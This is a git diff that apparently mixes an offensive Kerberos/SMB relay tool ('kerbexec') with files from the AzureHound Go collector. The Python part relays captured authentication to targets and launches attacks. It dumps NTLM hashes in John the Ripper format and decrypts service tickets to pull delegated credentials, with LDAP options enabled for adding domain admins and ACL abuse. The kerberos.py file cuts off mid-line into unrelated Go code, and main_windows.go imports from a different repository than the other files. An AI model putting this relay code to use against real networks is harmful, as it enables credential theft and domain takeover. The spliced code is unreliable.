smb.SMB.FLAGS2_EXTENDED_SECURITY + packet['Command'] = recvPacket['Command'] + packet['Pid'] = recvPacket['Pid'] + packet['Tid'] = recvPacket['Tid'] + packet['Mid'] = recvPacket['Mid'] + packet['Uid'] = recvPacket['Uid'] + packet['Data'] = '\x00\x00\x00' + packet['ErrorCode'] = errorCode >> 16 + packet['ErrorClass'] = errorCode & 0xff + + #Log this target as processed for this client + self.targetprocessor.logTarget(self.target) + + # Finish client's connection + #client.killConnection() + + return None, [packet], errorCode + else: + # We have a session, create a thread and do whatever we want + LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % ( + self.target.scheme, self.target.netloc, sessionSetupData['PrimaryDomain'], + sessionSetupData['Account'])) + + self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper() + + # Log this target as processed for this client + self.targetprocessor.logTarget(self.target, True) + + ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], + sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) + client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.getJTRdumpPath() != '': + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.getJTRdumpPath()) + + del (smbData[self.target]) + + self.do_attack(client) + # Now continue with the server + ############################################################# + + respData['NativeOS'] = smbServer.getServerOS() + respData['NativeLanMan'] = smbServer.getServerOS() + respSMBCommand['Parameters'] = respParameters + respSMBCommand['Data'] = respData + + # From now on, the client can ask for other commands + connData['Authenticated'] = True + + ############################################################# + # SMBRelay + smbServer.setConnectionData('SMBRelay', smbData) + ############################################################# + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, errorCode + ################################################################################ + + def do_attack(self, authdata): + # Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.config.attacks: + client = self.config.protocolClients[target.scheme.upper()](self.config, parsed_target) + client.initConnection(authdata, self.config.dcip) + # We have an attack.. go for it + attack = self.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) + + def do_relay(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + sclass, host = authdata['service'].split('/') + for target in self.config.target.originalTargets: + parsed_target = target + if host.lower() in parsed_target.hostname.lower(): + # Found a target with the same SPN + client = self.config.protocolClients[target.scheme.upper()](self.config, parsed_target) + client.initConnection(authdata, self.config.dcip) + # We have an attack.. go for it + attack = self.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.config, client.session, self.authUser) + client_thread.start() + return + # Still here? Then no target was found matching this SPN + LOG.error('No target configured that matches the hostname of the SPN in the ticket: %s', parsed_target.netloc.lower()) + + def _start(self): + self.server.daemon_threads=True + self.server.serve_forever() + LOG.info('Shutting down SMB Server') + self.server.server_close() + + def run(self): + LOG.info("Setting up SMB Server") + self._start() diff --git a/kerbexec/utils/__init__.py b/kerbexec/utils/__init__.py new file mode 100644 index 0000000..2ae2839 --- /dev/null +++ b/kerbexec/utils/__init__.py @@ -0,0 +1 @@ +pass diff --git a/kerbexec/utils/config.py b/kerbexec/utils/config.py new file mode 100644 index 0000000..580a14f --- /dev/null +++ b/kerbexec/utils/config.py @@ -0,0 +1,57 @@ +""" +Config class, mostly extended from ntlmrelayx +""" +from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig + +class KrbRelayxConfig(NTLMRelayxConfig): + def __init__(self): + NTLMRelayxConfig.__init__(self) + + # Auth options + self.dcip = None + self.aeskey = None + self.hashes = None + self.password = None + self.israwpassword = False + self.salt = None + + # Krb options + self.format = 'ccache' + + # LDAP options + self.dumpdomain = True + self.addda = True + self.aclattack = True + self.validateprivs = True + self.escalateuser = None + self.addcomputer = False + self.delegateaccess = False + + # Custom options + self.victim = None + + # Make sure we have a fixed version of this to avoid incompatibilities with impacket + def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid): + self.dumpdomain = dumpdomain + self.addda = addda + self.aclattack = aclattack + self.validateprivs = validateprivs + self.escalateuser = escalateuser + self.addcomputer = addcomputer + self.delegateaccess = delegateaccess + self.dumplaps = dumplaps + self.dumpgmsa = dumpgmsa + self.dumpadcs = dumpadcs + self.sid = sid + + def setAuthOptions(self, aeskey, hashes, dcip, password, salt, israwpassword=False): + self.dcip = dcip + self.aeskey = aeskey + self.hashes = hashes + self.password = password + self.salt = salt + self.israwpassword = israwpassword + + def setKrbOptions(self, outformat, victim): + self.format = outformat + self.victim = victim \ No newline at end of file diff --git a/kerbexec/utils/kerberos.py b/kerbexec/utils/kerberos.py new file mode 100644 index 0000000..cb2c9ff --- /dev/null +++ b/kerbexec/utils/kerberos.py @@ -0,0 +1,335 @@ +from __future__ import unicode_literals +import struct +import datetime +import random +from binascii import unhexlify, hexlify +from pyasn1.type.univ import noValue +from pyasn1.codec.der import decoder, encoder +from pyasn1.error import PyAsn1Error +from ldap3 import Server, Connection, NTLM, ALL, SASL, KERBEROS +from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED +from ldap3.operation.bind import bind_operation +from impacket.spnego import SPNEGO_NegTokenInit, TypesMech +from impacket.krb5.gssapi import KRB5_AP_REQ, GSS_C_DELEG_FLAG +from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \ + Ticket as TicketAsn1, EncTGSRepPart, EncTicketPart, AD_IF_RELEVANT, Ticket as TicketAsn1, KRB_CRED, EncKrbCredPart + +from impacket.krb5.crypto import Key, _enctype_table, Enctype, InvalidChecksum, string_to_key +from .krbcredccache import KrbCredCCache +from .spnego import GSSAPIHeader_SPNEGO_Init, GSSAPIHeader_KRB5_AP_REQ +from impacket import LOG +from impacket.krb5.types import Principal, KerberosTime, Ticket +from impacket.krb5 import constants +from impacket.krb5.kerberosv5 import getKerberosTGS +from Cryptodome.Hash import HMAC, MD4 + +def get_auth_data(token, options): + # Do we have a Krb ticket? + blob = decoder.decode(token, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + data = blob['innerContextToken']['negTokenInit']['mechToken'] + try: + payload = decoder.decode(data, asn1Spec=GSSAPIHeader_KRB5_AP_REQ())[0] + except PyAsn1Error: + raise Exception('Error obtaining Kerberos data') + # If so, assume all is fine and we can just pass this on to the legit server + # we just need to get the correct target name + apreq = payload['apReq'] + + # Get ticket data + domain = str(apreq['ticket']['realm']).lower() + # Assume this is NT_SRV_INST with 2 labels (not sure this is always the case) + sname = '/'.join([str(item) for item in apreq['ticket']['sname']['name-string']]) + + # We dont actually know the client name, either use unknown$ or use the user specified + if options.victim: + username = options.victim + else: + username = f"unknown{random.randint(0, 10000):04d}$" + return { + "domain": domain, + "username": username, + "krbauth": token, + "service": sname, + "apreq": apreq + } + +def get_kerberos_loot(token, options): + from pyasn1 import debug + # debug.setLogger(debug.Debug('all')) + # Do we have a Krb ticket? + blob = decoder.decode(token, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + # print str(blob) + + data = blob['innerContextToken']['negTokenInit']['mechToken'] + + try: + payload = decoder.decode(data, asn1Spec=GSSAPIHeader_KRB5_AP_REQ())[0] + except PyAsn1Error: + raise Exception('Error obtaining Kerberos data') + # print payload + # It is an AP_REQ + decodedTGS = payload['apReq'] + # print decodedTGS + + # Get ticket data + + cipherText = decodedTGS['ticket']['enc-part']['cipher'] + + # Key Usage 2 + # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or + # application session key), encrypted with the service key + # (section 5.4.2) + + newCipher = _enctype_table[int(decodedTGS['ticket']['enc-part']['etype'])] + + # Create decryption keys from specified Kerberos keys + if options.hashes is not None: + nthash = options.hashes.split(':')[1] + else: + nthash = '' + + aesKey = options.aeskey or '' + + allciphers = [ + int(constants.EncryptionTypes.rc4_hmac.value), + int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), + int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value) + ] + + # Store Kerberos keys + # TODO: get the salt from preauth info (requires us to send AS_REQs to the DC) + keys = {} + + if nthash != '': + keys[int(constants.EncryptionTypes.rc4_hmac.value)] = unhexlify(nthash) + if aesKey != '': + if len(aesKey) == 64: + keys[int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)] = unhexlify(aesKey) + else: + keys[int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value)] = unhexlify(aesKey) + + ekeys = {} + for kt, key in keys.items(): + ekeys[kt] = Key(kt, key) + + # Calculate Kerberos keys from specified password/salt + if options.password and options.salt: + for cipher in allciphers: + if cipher == 23 and options.israwpassword: + # RC4 calculation is done manually for raw passwords + md4 = MD4.new() + md4.update(options.password) + ekeys[cipher] = Key(cipher, md4.digest()) + else: + # Do conversion magic for raw passwords + if options.israwpassword: + rawsecret = options.password.decode('utf-16-le', 'replace').encode('utf-8', 'replace') + else: + # If not raw, it was specified from the command line, assume it's not UTF-16 + rawsecret = options.password + ekeys[cipher] = string_to_key(cipher, rawsecret, options.salt) + LOG.debug('Calculated type %d Kerberos key: %s', cipher, hexlify(ekeys[cipher].contents)) + + # Select the correct encryption key + try: + key = ekeys[decodedTGS['ticket']['enc-part']['etype']] + # This raises a KeyError (pun intended) if our key is not found + except KeyError: + LOG.error('Could not find the correct encryption key! Ticket is encrypted with keytype %d, but keytype(s) %s were supplied', + decodedTGS['ticket']['enc-part']['etype'], + ', '.join([str(enctype) for enctype in ekeys.keys()])) + return None + + # Recover plaintext info from ticket + try: + plainText = newCipher.decrypt(key, 2, cipherText) + except InvalidChecksum: + LOG.error('Ciphertext integrity failed. Most likely the account password or AES key is incorrect') + if options.salt: + LOG.info('You specified a salt manually. Make sure it has the correct case.') + return + LOG.debug('Ticket decrypt OK') + encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0] + sessionKey = Key(encTicketPart['key']['keytype'], bytes(encTicketPart['key']['keyvalue'])) + + # Key Usage 11 + # AP-REQ Authenticator (includes application authenticator + # subkey), encrypted with the application session key + # (Section 5.5.1) + + # print encTicketPart + flags = encTicketPart['flags'].asBinary() + # print flags + # for flag in TicketFlags: + # if flags[flag.value] == '1': + # print flag + # print flags[TicketFlags.ok_as_delegate.value] + cipherText = decodedTGS['authenticator']['cipher'] + newCipher = _enctype_table[int(decodedTGS['authenticator']['etype'])] + # Recover plaintext info from authenticator + plainText = newCipher.decrypt(sessionKey, 11, cipherText) + + authenticator = decoder.decode(plainText, asn1Spec=Authenticator())[0] + # print authenticator + + # The checksum may contain the delegated ticket + cksum = authenticator['cksum'] + if cksum['cksumtype'] != 32771: + raise Exception('Checksum is not KRB5 type: %d' % cksum['cksumtype']) + + # Checksum as in 4.1.1 [RFC4121] + # Fields: + # 0-3 Length of channel binding info (fixed at 16) + # 4-19 channel binding info + # 20-23 flags + # 24-25 delegation option identifier + # 26-27 length of deleg field + # 28..(n-1) KRB_CRED message if deleg is used (n = length of deleg + 28) + # n..last extensions + flags = struct.unpack('. + +package logger + +import ( + "syscall" + + "github.com/rs/zerolog" + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/svc/eventlog" +) + +func NewEventLogWriter(name string) (zerolog.LevelWriter, error) { + if elog, err := eventlog.Open(name); err != nil { + return nil, err + } else { + return EventLogLevelWriter{elog}, nil + } +} + +type EventLogLevelWriter struct { + eventLog *eventlog.Log +} + +func (s EventLogLevelWriter) Write(msg []byte) (int, error) { + return s.WriteLevel(zerolog.InfoLevel, msg) +} + +func (s EventLogLevelWriter) WriteLevel(level zerolog.Level, msg []byte) (n int, err error) { + var eventType uint16 + switch level { + case zerolog.Disabled: + return 0, nil + case zerolog.ErrorLevel: + eventType = windows.EVENTLOG_ERROR_TYPE + default: + eventType = windows.EVENTLOG_INFORMATION_TYPE + } + + sysString := []*uint16{syscall.StringToUTF16Ptr(string(msg))} + if err := windows.ReportEvent(s.eventLog.Handle, eventType, 0, 1, 0, 1, 0, &sysString[0], nil); err != nil { + return 0, err + } else { + return len(msg), nil + } +} + +func (s EventLogLevelWriter) Close() error { + return s.eventLog.Close() +} diff --git a/logger/internal/logger.go b/logger/internal/logger.go new file mode 100644 index 0000000..e27fa5c --- /dev/null +++ b/logger/internal/logger.go @@ -0,0 +1,176 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package internal + +import ( + "io" + "os" + "path" + "time" + + "github.com/go-logr/logr" + "github.com/rs/zerolog" +) + +const ( + BaseCallDepth int = 2 + + // ErrorLevel limits logs to ERROR messages only + ErrorLevel int = -1 + // MaxInfoLevel allows ERROR, INFO, DEBUG and TRACE messages + MaxInfoLevel int = 2 + // MedInfoLevel allows ERROR, INFO, and DEBUG messages + MedInfoLevel int = 1 + // MinInfoLevel limits logs to ERROR and INFO messages + MinInfoLevel int = 0 +) + +type logSink struct { + logger *zerolog.Logger + name string + callDepth int +} + +// Options allows the user to set various options for the logr.Logger implementation +type Options struct { + // Structured enables structured logging + Structured bool + // Colors enables colors for unstructured logging only + Colors bool + // Writers defines which transports the logger should write to + Writers []io.Writer + // Level defines the logging verbosity; defaults to MinInfoLevel + Level int +} + +// NewLogger returns a new logr.Logger instance +func NewLogger(options Options) logr.Logger { + if len(options.Writers) == 0 { + options.Writers = append(options.Writers, os.Stderr) + } + + if !options.Structured { + for i, writer := range options.Writers { + options.Writers[i] = zerolog.ConsoleWriter{Out: writer, NoColor: !options.Colors, TimeFormat: time.RFC3339} + } + } + + writer := zerolog.MultiLevelWriter(options.Writers...) + logger := zerolog.New(writer).With().Timestamp().Logger() + + if options.Level < MinInfoLevel { + logger = logger.Level(zerolog.ErrorLevel) + } else { + lvl := calcLevel(options.Level) + logger = logger.Level(lvl) + } + + return logr.New(&logSink{ + logger: &logger, + name: "", + callDepth: BaseCallDepth, + }) +} + +// Enabled tests whether this logr.LogSink is enabled at the specified V-level. +// For example, commandline flags might be used to set the logging +// verbosity and disable some info logs. +func (s logSink) Enabled(level int) bool { + lvl := calcLevel(level) + if logEvent := s.logger.WithLevel(lvl); logEvent == nil { + return false + } else { + return logEvent.Enabled() + } +} + +// Error logs an error, with the given message and key/value pairs as +// context. See logr.Logger.Error for more details. +func (s logSink) Error(err error, msg string, keysAndValues ...interface{}) { + logEvent := s.logger.Error().Err(err) + s.log(logEvent, msg, keysAndValues) +} + +// Info logs a non-error message with the given key/value pairs as context. +// The level argument is provided for optional logging. This method will +// only be called when Enabled(level) is true. See logr.Logger.Info for more +// details. +func (s logSink) Info(level int, msg string, keysAndValues ...interface{}) { + lvl := calcLevel(level) + logEvent := s.logger.WithLevel(lvl) + s.log(logEvent, msg, keysAndValues) +} + +// Init receives optional information about the logr library for logr.LogSink +// implementations that need it. +func (s *logSink) Init(info logr.RuntimeInfo) { + s.callDepth = info.CallDepth + BaseCallDepth +} + +// WithName returns a new logr.LogSink with the specified name appended. See +// logr.Logger.WithName for more details. +func (s logSink) WithName(name string) logr.LogSink { + s.name = path.Join(s.name, name) + return &s +} + +// WithValues returns a new logr.LogSink with additional key/value pairs. See +// logr.Logger.WithValues for more details. +func (s logSink) WithValues(keysAndValues ...interface{}) logr.LogSink { + logger := s.logger.With().Fields(keysAndValues).Logger() + s.logger = &logger + return &s +} + +// WithCallDepth returns a logr.LogSink that will offset the call +// stack by the specified number of frames when logging call +// site information. +// +// If depth is 0, the logr.LogSink should skip exactly the number +// of call frames defined in logr.RuntimeInfo.CallDepth when Info +// or Error are called, i.e. the attribution should be to the +// direct caller of logr.Logger.Info or logr.Logger.Error. +// +// If depth is 1 the attribution should skip 1 call frame, and so on. +// Successive calls to this are additive. +func (s logSink) WithCallDepth(depth int) logr.LogSink { + s.callDepth += depth + return &s +} + +func (s logSink) log(e *zerolog.Event, msg string, keysAndValues []interface{}) { + if e != nil { + if s.name != "" { + e.Str("name", s.name) + } + + e.Fields(keysAndValues) + e.CallerSkipFrame(s.callDepth) + e.Msg(msg) + } +} + +func calcLevel(level int) zerolog.Level { + lvl := level + if level < MinInfoLevel { + lvl = MinInfoLevel + } else if level > MaxInfoLevel { + lvl = MaxInfoLevel + } + return zerolog.InfoLevel - zerolog.Level(lvl) +} diff --git a/logger/internal/logger_test.go b/logger/internal/logger_test.go new file mode 100644 index 0000000..eab2dd5 --- /dev/null +++ b/logger/internal/logger_test.go @@ -0,0 +1,135 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package internal + +import ( + "bytes" + "fmt" + "io" + "testing" + "time" + + "github.com/go-logr/logr" +) + +const ( + LogErrorTemplate string = `{"level":"error","error":"I'm an error","time":"%s","message":"Something happened"}%s` + LogInfoTemplate string = `{"level":"info","foo":"bar","name":"fakeName","baz":42,"buzz":true,"time":"%s","message":"teapot"}%s` + LogInfoUnstructuredTemplate string = "%s INF teapot baz=42 buzz=true foo=bar name=fakeName%s" +) + +func TestError(t *testing.T) { + writer := &bytes.Buffer{} + options := Options{ + Structured: true, + Writers: []io.Writer{writer}, + } + logger := NewLogger(options) + logError(logger)() + + got := writer.String() + want := fmt.Sprintf(LogErrorTemplate, now(), "\n") + + if got != want { + t.Errorf("got: %v\nwant: %v", got, want) + } +} + +func TestInfo(t *testing.T) { + writer := &bytes.Buffer{} + options := Options{ + Structured: true, + Writers: []io.Writer{writer}, + } + logger := NewLogger(options) + logInfo(logger)() + + got := writer.String() + want := fmt.Sprintf(LogInfoTemplate, now(), "\n") + + if got != want { + t.Errorf("got: %v\nwant: %v", got, want) + } +} + +func TestInfoErrorLevel(t *testing.T) { + writer := &bytes.Buffer{} + options := Options{ + Structured: true, + Writers: []io.Writer{writer}, + Level: ErrorLevel, + } + logger := NewLogger(options) + logInfo(logger)() + + got := writer.String() + want := "" + + if got != want { + t.Errorf("got: %v\nwant: %v", got, want) + } +} + +func TestInfoUnstructured(t *testing.T) { + writer := &bytes.Buffer{} + options := Options{ + Writers: []io.Writer{writer}, + } + logger := NewLogger(options) + logInfo(logger)() + + got := writer.String() + want := fmt.Sprintf(LogInfoUnstructuredTemplate, now(), "\n") + + if got != want { + t.Errorf("got: %v\nwant: %v", got, want) + } +} + +func TestEnabled(t *testing.T) { + errorsOnlyLogger := NewLogger(Options{Level: ErrorLevel}) + infoLogger := NewLogger(Options{Level: MinInfoLevel}) + + if errorsOnlyLogger.GetSink().Enabled(MinInfoLevel) != false { + t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), true) + } + + if infoLogger.GetSink().Enabled(MinInfoLevel-1) != true { + t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), true) + } + + if infoLogger.GetSink().Enabled(MaxInfoLevel+1) != false { + t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), false) + } +} + +func logInfo(logger logr.Logger) func() { + return func() { + logger.WithName("fakeName").WithValues("foo", "bar").Info("teapot", "baz", 42, "buzz", true) + } +} + +func logError(logger logr.Logger) func() { + return func() { + logger.Error(fmt.Errorf("I'm an error"), "Something happened") + } +} + +func now() string { + return time.Now().Format(time.RFC3339) +} diff --git a/logger/log.go b/logger/log.go new file mode 100644 index 0000000..546937f --- /dev/null +++ b/logger/log.go @@ -0,0 +1,47 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +//go:build !windows +// +build !windows + +package logger + +import ( + "io" + "os" + + "github.com/bloodhoundad/azurehound/v2/config" + logger "github.com/bloodhoundad/azurehound/v2/logger/internal" + "github.com/go-logr/logr" +) + +func setupLogger() (*logr.Logger, error) { + options := logger.Options{ + Level: config.VerbosityLevel.Value().(int), + Structured: config.JsonLogs.Value().(bool), + Colors: true, + Writers: []io.Writer{os.Stderr}, + } + + // emit logs to file if configured + if fileLogWriter := getFileLogLevelWriter(); fileLogWriter != nil { + options.Writers = append(options.Writers, fileLogWriter) + } + + logr := logger.NewLogger(options) + return &logr, nil +} diff --git a/logger/log_windows.go b/logger/log_windows.go new file mode 100644 index 0000000..7898678 --- /dev/null +++ b/logger/log_windows.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package logger + +import ( + "io" + "os" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" + logger "github.com/bloodhoundad/azurehound/v2/logger/internal" + "github.com/go-logr/logr" + "github.com/rs/zerolog" + "golang.org/x/sys/windows/svc" +) + +var eventLogWriter zerolog.LevelWriter + +func setupLogger() (*logr.Logger, error) { + var ( + logr logr.Logger + options = logger.Options{ + Level: config.VerbosityLevel.Value().(int), + Structured: config.JsonLogs.Value().(bool), + Colors: false, + Writers: []io.Writer{os.Stderr}, + } + ) + + // services should emit messages to the windows event log + if eventLogWriter := getEventLogLevelWriter(); eventLogWriter != nil { + options.Writers = append(options.Writers, eventLogWriter) + } + + // emit logs to file if configured + if fileLogWriter := getFileLogLevelWriter(); fileLogWriter != nil { + options.Writers = append(options.Writers, fileLogWriter) + } + + logr = logger.NewLogger(options) + return &logr, nil +} + +func getEventLogLevelWriter() zerolog.LevelWriter { + if eventLogWriter != nil { + return eventLogWriter + } else if isWindowsService, err := svc.IsWindowsService(); !isWindowsService || err != nil { + return nil + } else if eventLogWriter, err := NewEventLogWriter(constants.Name); err != nil { + return nil + } else { + return eventLogWriter + } +} diff --git a/logger/utils.go b/logger/utils.go new file mode 100644 index 0000000..d433aa7 --- /dev/null +++ b/logger/utils.go @@ -0,0 +1,56 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package logger + +import ( + "io" + "os" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/go-logr/logr" +) + +var ( + log *logr.Logger + fileLogWriter io.Writer +) + +func getFileLogLevelWriter() io.Writer { + if fileLogWriter != nil { + return fileLogWriter + } else if logfile, ok := config.LogFile.Value().(string); !ok || logfile == "" { + return nil + } else if file, err := os.OpenFile(logfile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666); err != nil { + return nil + } else { + return file + } +} + +func GetLogger() (*logr.Logger, error) { + if log != nil { + return log, nil + } + + if logr, err := setupLogger(); err != nil { + return nil, err + } else { + log = logr + return log, nil + } +} diff --git a/main.go b/main.go new file mode 100644 index 0000000..b6d8083 --- /dev/null +++ b/main.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +//go:build !windows +// +build !windows + +package main + +import ( + "fmt" + "os" + + "github.com/bloodhoundad/azurehound/v2/cmd" + "github.com/bloodhoundad/azurehound/v2/constants" +) + +func main() { + fmt.Fprintf(os.Stderr, "%s %s\n%s\n\n", constants.DisplayName, constants.Version, constants.AuthorRef) + cmd.Execute() +} diff --git a/main_windows.go b/main_windows.go new file mode 100644 index 0000000..0855982 --- /dev/null +++ b/main_windows.go @@ -0,0 +1,41 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package main + +import ( + "fmt" + + "golang.org/x/sys/windows/svc" + + "github.com/byt3n33dl3/azurehoundad/v2/cmd" + "github.com/byt3n33dl3/azurehoundad/v2/constants" +) + +func main() { + fmt.Printf("%s %s\n%s\n\n", constants.DisplayName, constants.Version, constants.AuthorRef) + + if isWinSvc, err := svc.IsWindowsService(); err != nil { + panic(err) + } else if isWinSvc { + if err := cmd.StartWindowsService(); err != nil { + panic(err) + } + } else { + cmd.Execute() + } +} diff --git a/models/app-member.go b/models/app-member.go new file mode 100644 index 0000000..c56b3f6 --- /dev/null +++ b/models/app-member.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type AppMember struct { + json.RawMessage + AppId string `json:"appId"` +} + +func (s *AppMember) MarshalJSON() ([]byte, error) { + var data map[string]any + if err := json.Unmarshal(s.RawMessage, &data); err != nil { + return nil, err + } else { + StripEmptyEntries(data) + data["appId"] = s.AppId + return json.Marshal(data) + } +} diff --git a/models/app-owner.go b/models/app-owner.go new file mode 100644 index 0000000..ec3ac64 --- /dev/null +++ b/models/app-owner.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type AppOwner struct { + Owner json.RawMessage `json:"owner"` + AppId string `json:"appId"` +} + +func (s *AppOwner) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["appId"] = s.AppId + + if owner, err := OmitEmpty(s.Owner); err != nil { + return nil, err + } else { + output["owner"] = owner + return json.Marshal(output) + } +} + +type AppOwners struct { + Owners []AppOwner `json:"owners"` + AppId string `json:"appId"` +} diff --git a/models/app-role-assignments.go b/models/app-role-assignments.go new file mode 100644 index 0000000..f00fd8d --- /dev/null +++ b/models/app-role-assignments.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type AppRoleAssignment struct { + azure.AppRoleAssignment + AppId string `json:"appId"` + TenantId string `json:"tenantId"` +} diff --git a/models/app.go b/models/app.go new file mode 100644 index 0000000..238d2ad --- /dev/null +++ b/models/app.go @@ 